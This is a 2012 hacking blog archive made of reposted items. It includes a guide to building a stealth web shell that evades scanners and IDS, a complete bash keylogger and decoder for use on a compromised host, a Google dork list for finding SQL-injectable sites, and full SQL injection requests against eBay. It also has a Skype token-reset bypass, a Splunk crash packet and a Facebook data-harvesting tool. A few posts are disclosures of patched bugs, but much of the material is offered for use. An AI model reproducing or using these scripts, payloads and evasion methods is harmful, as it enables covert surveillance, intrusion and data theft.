Nov 24, 2012

PageScan - Webbased Malware Analysis


PageScan is a web content scraper for web-based malware analysis. It assist analyst by detecting and listing any redirection, iframe, javascript, and links found inside the web page

Source: https://github.com/d3t0n4t0r/pagescan


 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 22, 2012

Howto: Installing Mac OS X Mountain Lion in VMWare By SecurityLearn

Mountain Lion VM:
1) Download VMware workstation 8 – Torrent Link
2) Enable hardware virtualization in the computer BIOS – If you don’t know how to do this, Read this link
3) Download Mac OS X Mountain Lion Vmware Image - Torrent Link
4) Vmware does not support the virtualization of OS X. To unlock the Vmware, extract the Mountain Lion Vmware image and go to ‘VMware Unlocker – Mac OS X Guest\VMware 8.x Series\VMware Workstation Unlocker – Windows’ folder. Right click on the ‘Install.bat’ and run it as administrator. It patches the Vmware and allows the installation of Mac OS X.
5) In the extracted vmware image, click on the .vmx file and it will load the Mountain Lion VM.


Source:  http://www.securitylearn.net/2012/11/22/installing-mac-os-x-mountain-lion-in-vmware/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 21, 2012

Writing a stealth web shell


No bad function calls
The shell should not contain any bad function calls such as eval, passthru, exec, system, `` or similar operators. This is to avoid detection from scanners such as anti vrus or static analysis tools. We have a few options here, such as using a variable variable to dynamically assign the function to call,  or we could go with the non alpha php shell. I did however choose to go with a feature that relies on common methods and AFAIK not many scanners pick up on variable function calls.

Hidden file
I already solved this with my htshells project. Having your shell in a dot file keeps it hidden on linux. If you cannot upload a .htaccess file however I would aim to hide in plain sight with a index.php file instead.

Hidden payload
In order to keep the payload out of the url we'll provide it outside of the request URI and request body. A cookie is a common place to store the payload, but I decided to use a non cookie header. Just to be safe, in case someone decides to log cookies.

Hidden url
Luckily the htaccess file also offers us an option to hide the url of our web shell using mod_rewrite. This allows us to invoke the shell through a different url.

WAF/IDS bypass
By applying common encoding we can ensure that plaintext rules don't match our payload and make parsing the request expensive enough to ensure that realtime decoding isn't feasible. For the extra paranoid, encoding in combination with basic obfuscation will stop detection by IDS which can offload the offline decoding to an agent. I chose plain base64_encoding, and padded it with some bytes to make automated parsing fail.

Limited forensic evidence
This is where most shells fails, most web scripts use request parameters for command input. This is great on penetration tests as it offers transparency to the client, but it's not very stealthy. I'll start by illustrating a log segment for favicon requests.


Source: http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Key Logger With Bash Script

If you want to get the shell or story of this script, please go to the Source. 
 
Key Logger Script. 
#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd 
xmodmap -pke > /tmp/.xkey.log
script -c "xinput test $kbd" | cat >> /tmp/.xkey.log & 
echo "The keylog can be downloaded from /tmp/.xkey.log" 
echo "Use the meterpreter download function" 
echo "Press CTLR+C to exit this session, keylogger will run in backround"
 
 
Decode script

#!/bin/sh 
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog 
rm -f .xkey.log 
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py 
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo '   table = open("xmodmap.pke")' >> decoder.py
echo '   key = []' >> decoder.py
echo '   for line in table:' >> decoder.py
echo "      m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo '      if m and m.groups()[1]:' >> decoder.py
echo '         key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo '   return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo '      key=keyMap();' >> decoder.py
echo '      for i in key:' >> decoder.py
echo '              if str(letter) == i.split("_____")[1]:' >> decoder.py
echo '                     return i.split("_____")[0]' >> decoder.py
echo '      return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo '        print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo '        exit();' >> decoder.py
echo 'else:' >> decoder.py
echo '        f = open(sys.argv[1])' >> decoder.py
echo '        lines = f.readlines()' >> decoder.py
echo '        f.close()' >> decoder.py
echo '        for line in lines:' >> decoder.py
echo "                m = re.match('key press +(\d+)', line)" >> decoder.py
echo '                if m:' >> decoder.py
echo '                          keycode = m.groups()[0]' >> decoder.py
echo '                          print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......' 
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger 
rm -f LOG 
rm -f xmodmap.pke 
rm -f decoder.py
rm -f xlog 
cat LOG-keylogger
 


Source: http://astr0baby.wordpress.com/2012/11/20/hacking-ubuntu-12-04-lts-using-metasploit/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nice tool for API Monitoring

 API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

Source: http://www.rohitab.com/apimonitor#Download
             http://www.sensepost.com/blog/7802.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 20, 2012

Example Of Google Dork List For SQL Injection

If you want to see all example, please go to the Source.

tekst.php?idt= newscat.php?id= newsticker_info.php?idn= rubrika.php?idr= offer.php?idf= "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: getimagesize() "id=" & intext:"Warning: session_start() "id=" & intext:"Warning: mysql_num_rows() "id=" & intext:"Warning: mysql_query() "id=" & intext:"Warning: array_merge() "id=" & intext:"Warning: preg_match() "id=" & intext:"Warning: ilesize() "id=" & intext:"Warning: filesize() index.php?id= buy.php?category= article.php?ID= play_old.php?id= newsitem.php?num= top10.php?cat= historialeer.php?num= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= sql.php?id= news_view.php?id= select_biblio.php?id= humor.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id= faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id= announce.php?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id= read.php?id= prod_detail.php?id= article.php?id= person.php?id= productinfo.php?id= showimg.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= rub.php?idr= view_faq.php?id= artikelinfo.php?id= detail.php?ID= index.php?= profile_view.php?id= category.php?id= publications.php?id= fellows.php?id= downloads_info.php?id= prod_info.php?id= shop.php?do=part&id= collectionitem.php?id= band_info.php?id= product.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= viewshowdetail.php?id= clubpage.php?id= memberInfo.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= tradeCategory.php?id= product_ranges_view.php?ID= shop_category.php?id= transcript.php?id= channel_id= item_id= newsid= trainers.php?id= news-full.php?id= news_display.php?getid= index2.php?option= readnews.php?id= newsone.php?id= product-item.php?id= pages.php?id= clanek.php4?id= viewapp.php?id= viewphoto.php?id= galeri_info.php?l= iniziativa.php?in= curriculum.php?id= labels.php?id= story.php?id= look.php?ID= aboutbook.php?id= "id=" & intext:"Warning: mysql_fetch_assoc() "id=" & intext:"Warning: is_writable() "id=" & intext:"Warning: Unknown() "id=" & intext:"Warning: mysql_result() "id=" & intext:"Warning: pg_exec() "id=" & intext:"Warning: require() buy.php?category= pageid= page.php?file= show.php?id= newsitem.php?num= readnews.php?id= top10.php?cat= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= sql.php?id= select_biblio.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= kategorie.php4?id= 

Source: http://zer0byte.com/zeropastebin/?d12c062f86fa9e24#cGNgkzCl1DdTjjGzkavkAxv3i/OFxAMrdykli9hmQdY= 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Exploitable SQLi on Ebay.com - Analysis By David Vieira-Kurz


The vulnerable page was located at http://sea.ebay.com/news.php and the vulnerable parameter was the “checkbox” Array POST parameter. During the research I found that everytime you put some SQL statements there it will show you a typical SQL error message saying that the syntax is wrong. For example when I supplied:
Enforcing an error message - @@secalert
1
2
3
4
...
POST /news.php?time=3&catid=31 HTTP/1.1
...
checkbox%5B%5D=(select @@secalert)
the webserver responded saying: “Unknown systen variable ‘secalert’.

But everytime I had supplied a correct syntax I saw no results. So the only chance I saw there was to start a sub-query using a nested SELECT statement which would then give me some results when the syntax of the main SELECT statement is incorrect. So here we go:
SQL Injection PoC 1 - @@version
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
The webserver then responsed with following message. I have marked the interesting part showing version of the used DBMS.

To ensure that is not just a lucky random I decided to make a second request asking for the current DBMS user.
SQL Injection PoC 2 - user()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&
The webserver then responsed with following message. I have marked the interesting part showing the current DBMS user.

Source: http://blog.majorsecurity.net/2012/11/18/exploitable-sqli-on-ebay-dot-com-analysis/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nice Source For Ruby

These links are knowledge base for learning Ruby.

http://www.rubyinside.com/ruby-cheat-sheet-734.html 
http://refcardz.dzone.com/refcardz/essential-ruby#refcard-download-social-buttons-display

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Skype Account Service Session Token Bypass

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without required user inter action and without privileged user account.
For demonstration or reproduce ...

Reset Account: (Mail Link) 
https://api.skype.com/tracking/emails/click?m=7131000014602077951&go=account.changepassword&x=intcmp%3DT_140-_-H-_-311012-_-
account.changepassword%26token%3D621d8b0e773cc298a149a1b916118114%26application%3Daccount

which leads to the expired request with the already used session 6h+ ago ...

https://login.skype.com/intl/de/account/password-reset-request?token=621d8b0e773cc298a149a1b916118114&mode=&token_expired=1

It is only required to insert 0 (zero) in the GET/POST request make the session valid again. Replace token_expired=1 => token_expired=0

https://login.skype.com/intl/de/account/password-reset-request?token=621d8b0e773cc298a149a1b916118114&mode=&token_expired=(+)0

Video(PoC Demo):

Solution:
=========
2012-11-12:  Vendor Fix/Patch (Skype)
 
Source: http://packetstormsecurity.org/files/118199 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Splunk 4.x Denial Of Service

Overview:

When a splunktcp-input (for use in Splunk-to-Splunk communication) is
configured, an attacker can send an initial packet with a malformed
'__s2s_capabilities' field. This leads to a crash of the splunkd daemon
making the splunktcp-input unavailable. If the Splunk web-interface is
running on the same host, it will be unavailable, too as it needs to
communicate with splunkd.

Description:

An example packet looks like this (__s2s_capabilities is just 'A' here):
"--splunk-cooked-mode-v3--\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0.\0\0\0\SOH\0\0\0\DC3__s2s_capabilities\0\0\0
\0\STXA\0\0\0\0\0\0\0\0\ENQ_raw\0"

When this packet is sent multiple times, splunkd eventually crashes with a
crash log similar to this one:

[build 128297] 2012-08-30 13:34:01
 Access violation, cannot read at address [0x00006A62]  Exception address:
[0x6FC4500A]  Crashing thread: TcpInputProcessor
    ContextFlags:  [0x0001007F]
    Dr0:  [0x00000000]
    Dr1:  [0x00000000]
    Dr2:  [0x00000000]
    Dr3:  [0x00000000]
    Dr6:  [0x00000000]
    Dr7:  [0x00000000]
    SegGs:  [0x00000000]
    SegFs:  [0x0000003B]
    SegEs:  [0x00000023]
    SegDs:  [0x00000023]
    Edi:  [0x099F0020]
    Esi:  [0x00006A62]
    Ebx:  [0x08BD5680]
    Edx:  [0x00000001]
    Ecx:  [0x01734000]
    Eax:  [0x05CD6A63]
    Ebp:  [0x03B0F9C4]
    Eip:  [0x6FC4500A] memcpy + 90/880
    SegCs:  [0x0000001B]
    EFlags:  [0x00010212]
    Esp:  [0x03B0F9BC]
    SegSs:  [0x00000023]

 OS: Windows
 Arch: i386

 Backtrace:
    Frame  0 @[0x03B0F9C4]:  [0x6FC80475] memcpy_s + 72/123
    Frame  1 @[0x03B0F9E0]:  [0x67DA1201]
           std::char_traits<char>::_Copy_s + 21/29
    Frame  2 @[0x03B0F9F8]:  [0x67DA394D]
     std::basic_string<char,std::char_traits<char>,
           std::allocator<char>>::assign + 126/146
    Frame  3 @[0x03B0FA1C]:  [0x67DA5E45]
           std::basic_string<char,std::char_traits<char>,
           std::allocator<char> >::operator= + 13/16
    Frame  4 @[0x05CD287C]:  [0x00006A62] ?
    Frame  5 @[0x0064656B]: (Frame below stack)

 Crash dump written to: C:\Program Files\Splunk\var\log\splunk\C__Program
Files_Splunk_bin_splunkd_exe_crash-2012-08-30-13-34-01.dmp

XXXXXXXXXXX /6.1 Service Pack 1
Threads running: 36
argv: [Splunkd -p 8089]
terminating...

Further analysis showed that the crash is indeed triggered by an incorrect
source address in a fastcopy_I call. It is unclear where this address comes
from, though and why the crash only happens after a certain amount of
packets.

Impact:

Denial of service of splunkd (and possibly the Splunk web-interface,
depending on configuration) until splunkd is restarted.

Fixes:

This issue has been fixed in Splunk 4.3.5 and 5.0.
 
Source: http://packetstormsecurity.org/files/118207 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 18, 2012

Facebook Pwn

A cross-platform Java based Facebook social engineering framework, sends friend requests to a list of Facebook profiles, and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all their information,photos and friend list to a local folder. Extensible module interfaces and built-in modules for advanced social engineering tricks.  

Source: http://code.google.com/p/fbpwn/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |